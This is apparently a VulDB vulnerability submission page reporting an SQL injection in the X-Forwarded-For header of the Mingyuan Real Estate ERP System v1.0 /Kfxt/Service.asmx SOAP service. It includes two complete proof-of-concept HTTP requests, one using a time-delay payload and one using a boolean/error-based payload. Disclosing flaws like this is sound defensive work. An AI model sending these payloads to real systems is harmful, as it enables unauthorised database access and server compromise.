提出 #513708: Shenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerability情報

タイトル	Shenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerability
説明	When the Mingyuan Real Estate ERP system WebService service verifies client IP permissions, it does not strictly filter and obtain the X-Forwarded-For real IP, resulting in a SQL injection vulnerability. Once an authenticated malicious attacker uses the SQL injection vulnerability to obtain information in the database (such as administrator background password, site user personal information), the attacker can even read commands to the server with high permissions to further obtain server system permissions. poc1: POST /Kfxt/Service.asmx HTTP/1.1 Host: User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive Content-Type: text/xml; charset=utf-8 X-Forwarded-For: 127.0.0.1');WAITFOR DELAY '0:0:5'-- SOAPAction: http://www.mysoft.com.cn/queryProjects Content-Length: 408 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <queryProjects xmlns="http://www.mysoft.com.cn/"> <inpXML><xml><buname>abc</buname></xml></inpXML> </queryProjects> </soap:Body> </soap:Envelope> poc2: POST /Kfxt/Service.asmx HTTP/1.1 Host: User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive Content-Type: text/xml; charset=utf-8 X-Forwarded-For: 127.0.0.1') AND 6994 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6994=6994) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113))) AND ('MEuY'='MEuY SOAPAction: http://www.mysoft.com.cn/queryProjects Content-Length: 408 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <queryProjects xmlns="http://www.mysoft.com.cn/"> <inpXML><xml><buname>abc</buname></xml></inpXML> </queryProjects> </soap:Body> </soap:Envelope>
ソース	⚠️ https://flowus.cn/share/fa5b99da-2e88-4efd-9266-ae8582782eaa?code=HC3R4E 【FlowUs 息流】Mingyuan Real Estate ERP System V1.0 X-Forwarded-For Injection Vulnerability
ユーザー	afish (UID 82290)
送信	2025年03月04日 03:46 (1 年 ago)
モデレーション	2025年03月15日 23:09 (12 days later)
ステータス	承諾済み
VulDBエントリ	299825 [Shenzhen Mingyuan Cloud Technology Mingyuan Real Estate ERP System 1.0 HTTP Header /Kfxt/Service.asmx X-Forwarded-For SQLインジェクション]
ポイント	20

◂ 前概要次 ▸

Do you need the next level of professionalism?

Upgrade your account now!